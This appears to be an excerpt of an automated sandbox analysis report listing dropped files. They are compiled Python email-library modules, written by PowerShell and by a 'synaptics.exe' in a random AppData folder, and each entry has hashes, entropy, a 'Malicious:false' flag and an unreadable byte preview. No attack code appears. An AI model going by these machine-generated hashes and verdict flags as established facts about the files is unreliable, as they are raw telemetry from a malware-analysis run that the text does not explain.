                                                                                                                                                                                                            Preview:o........b,dF".......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e...e...d...j.d.d.....Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.e.e.d...<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.e.d...Z.d.d...Z.e.e.d...Z.e.e.d...Z.d d.d...Z.d.S.)!z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c....................C...s....t...|...d.........S.).N.....)...bytes..fromhex..groupr....)...m..r.....]C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\lib\email\_encoded_words.py..<lambda>A...s......r....c....................C...s....|...d.d...}.t.|...g.f.S.).N....._..... )...replace.._q_byte_subber)...encodedr....r....r....r....C...s........r....c....................@...s,...e.Z.d.Z.d.e...d.....e..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5764
                                                                                                                                                                                                            Entropy (8bit):5.420643949632235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9OU9w0nkhN4XpaTzT797ta3T8qCpjjRtfklxvvp/qLfrg8NNOGbM//qH1uqs:dWN0UHy8h7fOvh/WgGN6XqHkqs
                                                                                                                                                                                                            MD5:9C52859FE97AB9BFB46393BA3BE9C904
                                                                                                                                                                                                            SHA1:88B1AA323DFD2C7DB01EF9C83497E5356B47A8DE
                                                                                                                                                                                                            SHA-256:4CD1CF068DA95D5B22FFB3D2E87E649F48BA13C29A199F62C583E8CEA5847BCD
                                                                                                                                                                                                            SHA-512:FC17ADD03DC7079E6DC988DF5491827552D8DD2AB07CCA5997AECCE6077367A4F53A63555997F7C5B1B20CA806F8AEB157DD6E1757C5058B9630F044A751ADC9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dF".......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e...e...d...j.d.d.....Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.e.e.d...<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.e.d...Z.d.d...Z.e.e.d...Z.e.e.d...Z.d d.d...Z.d.S.)!z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c....................C...s....t...|...d.........S.).N.....)...bytes..fromhex..groupr....)...m..r.....CC:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\_encoded_words.py..<lambda>A...s......r....c....................C...s....|...d.d...}.t.|...g.f.S.).N....._..... )...replace.._q_byte_subber)...encodedr....r....r....r....C...s........r....c....................@...s,...e.Z.d.Z.d.e...d.....e...d.....Z.d.d...Z.d.S.)..._
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12562
                                                                                                                                                                                                            Entropy (8bit):5.376501513429034
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:i8lfoInBPanIUGjdDOSpaPOqB2YlAG6CNALqrOHFAtEo8VetaaY:hlgIBMGj4P1AzCzOHCAeaT
                                                                                                                                                                                                            MD5:9A408A26A3FD81F85BF39D2D3AFEE972
                                                                                                                                                                                                            SHA1:1A6B831C10390F8357867FB7D6C6AF6ADD1250D2
                                                                                                                                                                                                            SHA-256:DE7AE75ED5DF418B533575F606781A919068BEF34DF642375209AA0BC9F37D7F
                                                                                                                                                                                                            SHA-512:DFBF915A5F8F2938EAB8B06FF2F96637409BFDD1BCB6D9E2229999272F0966C241662FB90DA31548581693965270B0CE16790F06A39DA585C63DF708349E53E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d.G.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., ).Z.janZ.febZ.marZ.apr..mayZ.junZ.julZ.aug..sep..octZ.nov..decZ.januaryZ.februaryZ.marchZ.aprilr....Z.juneZ.julyZ.augustZ.septemberZ.octoberZ.novemberZ.december).Z.monZ.tueZ.wedZ.thuZ.friZ.sat..sunip...i....i....i....iD...i....).Z.UTZ.UTC..GMT..Z..ASTZ.ADTZ.ESTZ.EDTZ.CSTZ.CDTZ.MSTZ.MDTZ.PSTZ.PDTc....................C...s,...t.|...}.|.s.d.S.|.d...d.u.r.d.|.d.<.t.|...S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..res..r.....YC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\lib\email\_parseaddr.pyr....-...s................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12536
                                                                                                                                                                                                            Entropy (8bit):5.369508704534582
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:38lfoaBPanIUGehShaPvqfaXJcCMr7UaZbWMFltbgKBk0:slgyMGePP+7Ua0MpG0
                                                                                                                                                                                                            MD5:0656409F8D1E1638D99BDB96B5FAE5D0
                                                                                                                                                                                                            SHA1:F510BF47EC0B9E91494651A0C19459DBC0D8E3E7
                                                                                                                                                                                                            SHA-256:C51969DE8C54204D0DFA084402DAE3BE84C65424CE7176AADA5408FB3371FB60
                                                                                                                                                                                                            SHA-512:BCCFE602736BC308D6E28DEFAE444D5772B18AA34A237E9E9C682D3A5FC2B8E5C419DC91F01218956C5E57378D8F669375FB46780AD692656AE1BD44C6DBD6A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.G.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., ).Z.janZ.febZ.marZ.apr..mayZ.junZ.julZ.aug..sep..octZ.novZ.decZ.januaryZ.februaryZ.marchZ.aprilr....Z.juneZ.julyZ.augustZ.septemberZ.octoberZ.novemberZ.december).Z.monZ.tueZ.wedZ.thuZ.friZ.satZ.sunip...i....i....i....iD...i....).Z.UTZ.UTC..GMT..ZZ.ASTZ.ADTZ.ESTZ.EDTZ.CSTZ.CDTZ.MSTZ.MDTZ.PSTZ.PDTc....................C...s,...t.|...}.|.s.d.S.|.d...d.u.r.d.|.d.<.t.|...S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..res..r.....?C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\_parseaddr.pyr....-...s................r....c....................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14832
                                                                                                                                                                                                            Entropy (8bit):5.055771504203681
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:tbtx+oovk6H2JvwhY1jaF7AyJAeb7AqDNF/EIRDAysM1Jd/GaOkdlL7+WpSla/AB:tbtJoM6H8vPiJAqVDApM1jeaOMh7G5rl
                                                                                                                                                                                                            MD5:79F155F15573A1D0C45713187B229456
                                                                                                                                                                                                            SHA1:080BD06E889C4D24267CB1E067756A9EC2F7C42F
                                                                                                                                                                                                            SHA-256:5A592E3E3C5BDB5F97C60A26D45C2ECF3C9259CFED016CEBF939249338E0B434
                                                                                                                                                                                                            SHA-512:6CA2979B4E31349189228C5AE30CB0A8FEE822D003A74B78A54E6E3B2F80992ABBD3EF836C6045C6AA9DA3C717CAE5F5B6417019F2C4BBD591D425A035CC3814
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,dW<.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.G.d.d...d.e.e.j.d...Z.e.G.d.d...d.e.....Z.e...Z.d.S.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c........................s@...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance except for those values changed.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14806
                                                                                                                                                                                                            Entropy (8bit):5.055537558362915
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Gbtx+rovk6H2JvwhY1jaF7AyJAeb7AqDNF/EIRDAysM1Jd/GaOkdlL7+WpSla/AB:Gbt+oM6H8vPiJAqVDApM1jeaOMh7G5rl
                                                                                                                                                                                                            MD5:7BFF144CD550CC36015DA2009E9472E7
                                                                                                                                                                                                            SHA1:FF01F808B465988B7AE1A6FBBAB74805CFE74C61
                                                                                                                                                                                                            SHA-256:19B80D9511248AB7B1235A9EBF03D873664B9CF7F30209EA8446606DB3B87F61
                                                                                                                                                                                                            SHA-512:02D7848718EC122A886E216E4246838A39666367A33EA9D586A0DB1637BCD3503A9EC9E0F771693B48897CC2D66E3194DE1773177694D523ED7AFF015EF189C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dW<.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.G.d.d...d.e.e.j.d...Z.e.G.d.d...d.e.....Z.e...Z.d.S.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c........................s@...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance except for those values changed.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3290
                                                                                                                                                                                                            Entropy (8bit):5.388579690940921
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:UFLsbReNFxrLc2QSaR+Eiig25FNV78ojIu:SLsle3dyhjn5F5
                                                                                                                                                                                                            MD5:935B3109E97E426BA0918B90F61DF314
                                                                                                                                                                                                            SHA1:5211BE954FB82C791BD5368CB679466E754F5704
                                                                                                                                                                                                            SHA-256:EF26BBF1413823F1786015E7397FFFCDB4AB9F4F97A60A790048D389329D156F
                                                                                                                                                                                                            SHA-512:3B9454B6B9C69DC6403AE4236B83F4E5367547A01F56DADE661DD491A67FF77A570049AC47882C57B1872829A448F96B1DEE69A955270FA741B12E3F7BB66C3E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d^........................@...sl...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.e.f.d.d...Z.d.d...Z.e.Z.e.Z.d.S.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.dec
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3264
                                                                                                                                                                                                            Entropy (8bit):5.388130524617021
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:TFLsbReNFxr32QSaR+Eiig25FNV78ojIu:5Lsle3rhjn5F5
                                                                                                                                                                                                            MD5:63B1BA6D142681F89A1694D38FEDD35E
                                                                                                                                                                                                            SHA1:69784C51DFD84070A46090EE2C7609F6A6401323
                                                                                                                                                                                                            SHA-256:0C121CD27813D077E347E9E99497A47CEE7DE710C3C0F35AD5AF15342C426B61
                                                                                                                                                                                                            SHA-512:00CF84B1205ABC4C8F217C18BEA2F8B2BEA6A4434ABA4EFC29D258681B8A059E4D094A5795DA3F3ECAC6FC1B4D272E6C3035D1D059423C3DA6DA69CC77ED8083
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d^........................@...sl...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.e.f.d.d...Z.d.d...Z.e.Z.e.Z.d.S.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.dec
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11625
                                                                                                                                                                                                            Entropy (8bit):5.326424804645246
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:c71q2Qm6z+wY0W28DGmthcQx6Pk/pOeFoUFVOb9PJ//abe8+xPW38Cw:s1ZRS+Zh2yGcz/p9FVObibL8Cw
                                                                                                                                                                                                            MD5:D5C634BE11C1D13D65277B33BE96E7EC
                                                                                                                                                                                                            SHA1:A950DCA33755F53D8DD2EFCF758955B501BBA9A6
                                                                                                                                                                                                            SHA-256:B79E0A195CEEB7E18A1497D8EBD1211EC4428E33E6C61C89285F60FFD50AD5AC
                                                                                                                                                                                                            SHA-512:F1581BC0B6381B408C1C6A11DDA2E767D04BA3A28F0886CE09981A0FFE8C0D62F087659470DE22C364DE183AD192093F4EECF46DF446327C5729F6CE8FFB3C88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d|D.......................@...s....g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8d9..Z.d:d;..Z.d<d=..Z.d>d?..Z.G.d@dA..dA..Z.d.S.)B)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252Z.viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1Z.latin_2z.latin-2Z.latin_3z.latin-3Z.latin_4z.latin-4Z.latin_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11599
                                                                                                                                                                                                            Entropy (8bit):5.326128385674395
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:/71q2Qm6z+wYNW28DGmahcQx6Pk/pO5oU/5Ob9WJ//abe8+xGb/+w:z1ZRS+Z82yGRz/p2/5ObDbv+w
                                                                                                                                                                                                            MD5:897C3880A1DCFF09BEEC05D282B91E43
                                                                                                                                                                                                            SHA1:0CE701718B70294050D8723F18B7FAD5CB103AC0
                                                                                                                                                                                                            SHA-256:CC6527A1C339C0D791E2C96C7C1C9994D453271BCC73F71695EBC32B9F9FF5B0
                                                                                                                                                                                                            SHA-512:B73C084C49DB271B88E4E0C6A0E42673589D51AA5F126B6C9052CE8EEF47A53761DD80735A6D1A1817FC8A036CE68636A01463084384455C7D8EAD10409FEF6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d|D.......................@...s....g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8d9..Z.d:d;..Z.d<d=..Z.d>d?..Z.G.d@dA..dA..Z.d.S.)B)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252Z.viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1Z.latin_2z.latin-2Z.latin_3z.latin-3Z.latin_4z.latin-4Z.latin_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1677
                                                                                                                                                                                                            Entropy (8bit):5.111138795649809
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:fy7gaTT5rqICrNt7x5T2aWuNXwQFd9EGZvPJ5rJxEwkJpDkvyz3:f/9ht7DT2aWEgQFYSvrEDkvyz3
                                                                                                                                                                                                            MD5:37482E3F36A9A1F5AC9C1A51C5AA2989
                                                                                                                                                                                                            SHA1:01BFBFAC2ECB91D94E3EDBF907DBFCBF6D63BEF8
                                                                                                                                                                                                            SHA-256:B45D7000461C6B4A43BDB73AE187D2268F9025B27F33658894762379664403F2
                                                                                                                                                                                                            SHA-512:98D1AF4EBBC52B548C1D55A1D5F9F51E65CCD1372D3391E6329EDDAC4999093E9FCD5EBDA4B01B3D2BDBB9E821B7C4FB7948DC8B64A55DDAEA2AC7CC3D79C88F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d?........................@...sP...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc....................C...s....t.|.d.d...}.|...d.d...S.).NT).Z.quotetabs..... s....=20)..._encodestring..replace)...s..enc..r.....WC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\lib\email\encoders.py.._qencode....s........r....c....................C...s0...|.j.d.d...}.t.t.|...d...}.|...|.....d.|.d.<.d.S.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..origZ.encdatar....r....r....r........s............r....c....................C...s*...|.j.d.d...}.t.|...}.|...|.....d.|.d.<.d.S.).zvEncode the message's payload in quoted-printable... Also, add an a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1651
                                                                                                                                                                                                            Entropy (8bit):5.1031500268843795
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:lGy7gaTT5rqICrNt7xAffWuNXwQFd9EGZvPJ5rJxEwkJpDkvyz3:lG/9ht7mfWEgQFYSvrEDkvyz3
                                                                                                                                                                                                            MD5:6E3558DD6D15B7E41F5F6A6B77F7D190
                                                                                                                                                                                                            SHA1:1C9076F2044B6B8B8F9F62E5CD3BFC385B8E0EB4
                                                                                                                                                                                                            SHA-256:2E7A8E6EAC58C37BE767F94346C8A85E28BD3C88007ECAA37717302822F4F09D
                                                                                                                                                                                                            SHA-512:FD4703C0A0D8ADE00121D1CE371E1E9525B31574DBA609B323424D88E50B4D8B0CF42C11601D7403479E9BB01613EFBC44A8CD36D1DC6950575EEDDC83355C8C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d?........................@...sP...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc....................C...s....t.|.d.d...}.|...d.d...S.).NT).Z.quotetabs..... s....=20)..._encodestring..replace)...s..enc..r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\encoders.py.._qencode....s........r....c....................C...s0...|.j.d.d...}.t.t.|...d...}.|...|.....d.|.d.<.d.S.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..origZ.encdatar....r....r....r........s............r....c....................C...s*...|.j.d.d...}.t.|...}.|...|.....d.|.d.<.d.S.).zvEncode the message's payload in quoted-printable... Also, add an appropriate Content-Transfe
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5752
                                                                                                                                                                                                            Entropy (8bit):4.746521444222003
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:GYI+E7YT1ZyHQ6ELjeDJ87gw1aXJE6iqFoARF3IloR/Qg1pDX4Qmbsru3m:GYTEOMQJ2DJ87gtXJniqn3IeWQCQmbsz
                                                                                                                                                                                                            MD5:6D3327BBD34A7AE89B1326151F2E2792
                                                                                                                                                                                                            SHA1:801337F636D64EB6BFB90F1B6BCCBA94EF2EDCA8
                                                                                                                                                                                                            SHA-256:A2D4347E73C01BD434695D4B5BBB299A61E159E689437A6F4F71848ACCB61A53
                                                                                                                                                                                                            SHA-512:6C2E838348B7079C8799E63A1B8F1903A9F6BD5B484449F5533DD68CD46DB883653D9004043D42E5DE6F0E3CD7AD0C83A678FDA8FAE3D9EF25F639205B948861
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o........b,d.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e...Z.G.d+d,..d,e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e...Z.d5S.)6z email package exception classes.c....................@........e.Z.d.Z.d.Z.d.S.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__..r....r.....UC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\lib\email\errors.pyr.................r....c....................@...r....)...MessageParseErrorz&Base class for message parsing errors.Nr....r....r....r....r....r........r....r....c....................@...r....)...HeaderParseErrorz.Error while parsing hea
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5726
                                                                                                                                                                                                            Entropy (8bit):4.742152793628666
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:pYI+E7YT1Z7Q6ELjeDJ87gw1aXJE6iqFoARF3IloR/Qg1pDX4Qmbsru3m:pYTEOZQJ2DJ87gtXJniqn3IeWQCQmbsz
                                                                                                                                                                                                            MD5:49A03A297AAA647E1535E1049F77B043
                                                                                                                                                                                                            SHA1:D68B674D0028BD91EF94C92E066AA32EC51F035D
                                                                                                                                                                                                            SHA-256:0A4EE2A72C125F9BF6785459CB2626FDA9E889E54FBE3F9F1E594A8EC6BF2ADA
                                                                                                                                                                                                            SHA-512:BCEC113E0E74C2F208C1E493899E92304F1EA8C92448B856872FC1A59C65EEB43D639BA2F458F02127D4229F32C06A9E03653821914F770E0E0524C149097F41
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
